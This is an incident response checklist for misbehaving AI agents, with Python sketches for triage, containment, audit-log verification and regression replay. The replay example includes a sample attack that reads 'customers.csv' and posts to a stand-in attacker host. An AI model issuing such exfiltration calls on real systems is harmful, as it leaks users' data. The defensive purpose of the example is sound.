
AI Agent Incident Response Checklist

Authensor

When an AI agent takes an unauthorized action, exposes sensitive data, or behaves unexpectedly, the response must be fast and structured. Ad hoc responses lead to missed steps, incomplete containment, and repeat incidents. This checklist splits the response into five phases, each with a target time window measured from detection.

Phase 1: Detection and Triage (0 to 15 minutes)

  • [ ] Confirm the incident is real (not a false positive from monitoring)
  • [ ] Classify severity: Critical (active harm), High (potential harm), Medium (policy violation, no harm), Low (anomalous but benign)
  • [ ] Notify the on-call safety engineer
  • [ ] Open an incident channel for coordination
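
The severity scale above can be encoded so that triage tooling applies it the same way every time. The sketch below is a minimal Python illustration, assuming triage produces four yes/no answers; `TriageFacts`, `Severity`, and `classify` are hypothetical names, not part of any Authensor API.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Optional


class Severity(Enum):
    CRITICAL = "critical"  # active harm
    HIGH = "high"          # potential harm
    MEDIUM = "medium"      # policy violation, no harm
    LOW = "low"            # anomalous but benign


@dataclass
class TriageFacts:
    """Hypothetical answers collected during triage."""
    confirmed: bool         # False if the alert was a monitoring false positive
    active_harm: bool
    potential_harm: bool
    policy_violation: bool


def classify(facts: TriageFacts) -> Optional[Severity]:
    """Map triage answers to a severity; None means no incident."""
    if not facts.confirmed:
        return None
    # Check from most to least severe so the worst applicable level wins.
    if facts.active_harm:
        return Severity.CRITICAL
    if facts.potential_harm:
        return Severity.HIGH
    if facts.policy_violation:
        return Severity.MEDIUM
    return Severity.LOW
```

Because the checks run from most to least severe, an event that is both a policy violation and a potential harm is classified High, not Medium.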

Phase 2: Containment (15 to 60 minutes)

  • [ ] Activate the kill switch if the agent is actively causing harm
  • [ ] If the incident is not Critical, switch the agent to shadow mode (evaluate but do not execute)
  • [ ] Revoke or rotate any credentials the agent may have exposed
  • [ ] Block the specific tool or action involved in the incident
  • [ ] Preserve all logs and audit trail receipts before any cleanup
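
The containment controls interact: the kill switch overrides everything, a blocked tool is refused in any mode, and shadow mode records what would have run without running it. The sketch below shows a gate that enforces that precedence in front of each tool call, assuming a single in-process gate; `ContainmentGate`, `Mode`, and `should_execute` are hypothetical names for illustration only.

```python
from dataclasses import dataclass, field
from enum import Enum
from typing import List, Set


class Mode(Enum):
    NORMAL = "normal"  # evaluate and execute
    SHADOW = "shadow"  # evaluate and log, but do not execute
    KILLED = "killed"  # kill switch: execute nothing


@dataclass
class ContainmentGate:
    """Hypothetical gate consulted before every tool call."""
    mode: Mode = Mode.NORMAL
    blocked_tools: Set[str] = field(default_factory=set)
    log: List[str] = field(default_factory=list)

    def should_execute(self, tool: str) -> bool:
        # The kill switch takes precedence over every other control.
        if self.mode is Mode.KILLED:
            self.log.append(f"killed: refused {tool}")
            return False
        # A tool blocked during containment is refused in any mode.
        if tool in self.blocked_tools:
            self.log.append(f"blocked: refused {tool}")
            return False
        # Shadow mode records the intended call without running it.
        if self.mode is Mode.SHADOW:
            self.log.append(f"shadow: would run {tool}")
            return False
        self.log.append(f"allowed: {tool}")
        return True
```

For example, `ContainmentGate(mode=Mode.SHADOW, blocked_tools={"send_email"})` refuses every call but logs `send_email` as blocked and other tools as "would run", which keeps a record of the agent's intent for the investigation phase.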

Phase 3: Investigation (1 to 24 hours)

  • [ ] Pull the complete audit trail for the agent's session
  • [ ] Verify audit trail integrity by recomputing the hash chain
  • [ ] Identify the root cause: Was this a policy gap, prompt injection, tool misconfiguration, or model behavior?
  • [ ] Determine the blast radius: What data was accessed? What actions were taken? Who was affected?
  • [ ] Document the full timeline of events
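
Checking the hash chain means recomputing each entry's hash from its content and the previous entry's hash; an edited or reordered entry, or one removed from the middle of the log, breaks the chain at that point. The sketch below assumes a simple format (SHA-256 over the previous hash plus canonical JSON of the entry's payload, with an all-zero genesis hash). Your audit system's actual receipt format may differ, and `append` and `verify` are hypothetical helpers.

```python
import hashlib
import json
from typing import Any, Dict, List, Optional

GENESIS = "0" * 64  # assumed "previous hash" for the first entry


def entry_hash(prev_hash: str, payload: Dict[str, Any]) -> str:
    """SHA-256 of the previous hash followed by canonical JSON of the payload."""
    body = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode("utf-8")).hexdigest()


def append(chain: List[Dict[str, Any]], payload: Dict[str, Any]) -> None:
    """Add an entry linked to the hash of the entry before it."""
    prev = chain[-1]["hash"] if chain else GENESIS
    chain.append({"prev": prev, "payload": payload, "hash": entry_hash(prev, payload)})


def verify(chain: List[Dict[str, Any]]) -> Optional[int]:
    """Return the index of the first broken entry, or None if the chain is intact."""
    prev = GENESIS
    for i, entry in enumerate(chain):
        if entry["prev"] != prev or entry["hash"] != entry_hash(prev, entry["payload"]):
            return i
        prev = entry["hash"]
    return None
```

Changing any payload after the fact, for example `chain[1]["payload"]`, makes `verify` return `1`, the first index whose stored hash no longer matches. Note that a chain on its own cannot reveal entries truncated from the end; that requires recording the latest hash somewhere separate.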

Phase 4: Remediation (24 to 72 hours)

  • [ ] Update the policy to prevent recurrence
  • [ ] Add detection rules for the specific attack pattern
  • [ ] Test the fix with the original attack input
  • [ ] Re-enable the agent in shadow mode and verify correct behavior
  • [ ] Gradually restore full operation
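
Testing the fix with the original attack input is effectively a regression test, and gradual restoration can be run as a staged ramp. The sketch below shows both under stated assumptions: the recorded tool calls are illustrative values standing in for the incident's audit trail, `updated_policy` is a hypothetical patched rule, and the `RAMP` percentages and the rule of dropping back to shadow mode on any violation are placeholders, not recommended values.

```python
from dataclasses import dataclass
from typing import Callable, List


@dataclass(frozen=True)
class ToolCall:
    tool: str
    argument: str


def updated_policy(call: ToolCall) -> bool:
    """Hypothetical patched policy: True means the call is allowed.

    Assumed fix: outbound HTTP POSTs may only target an allowlisted host.
    """
    if call.tool == "http_post":
        return call.argument.startswith("https://api.internal.example/")
    return True


# Illustrative stand-in for the tool calls recorded during the incident.
ORIGINAL_ATTACK = [
    ToolCall("read_file", "customers.csv"),
    ToolCall("http_post", "https://attacker.example/upload"),
]


def replay(calls: List[ToolCall], policy: Callable[[ToolCall], bool]) -> List[ToolCall]:
    """Return the recorded calls that the policy would still allow."""
    return [call for call in calls if policy(call)]


# Assumed ramp: percent of requests executed for real at each stage.
# Stage 0 is shadow mode; the last stage is full operation.
RAMP = [0, 5, 25, 50, 100]


def next_stage(stage: int, violations: int) -> int:
    """Advance one stage after a clean period; drop back to shadow mode on any violation."""
    if violations > 0:
        return 0
    return min(stage + 1, len(RAMP) - 1)
```

If `replay(ORIGINAL_ATTACK, updated_policy)` still contains the exfiltration call, the fix has not closed the path the attack used.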

Phase 5: Post-Incident Review (within 1 week)

  • [ ] Conduct a blameless post-incident review with all involved parties
  • [ ] Document lessons learned and action items
  • [ ] Update the incident response runbook based on findings
  • [ ] Share anonymized findings with the broader team

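Every incident is an opportunity to strengthen the safety system. Treat the post-incident review as the most important phase: it is where the lessons from a single incident become lasting changes to policies, detection rules, and the runbook itself.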
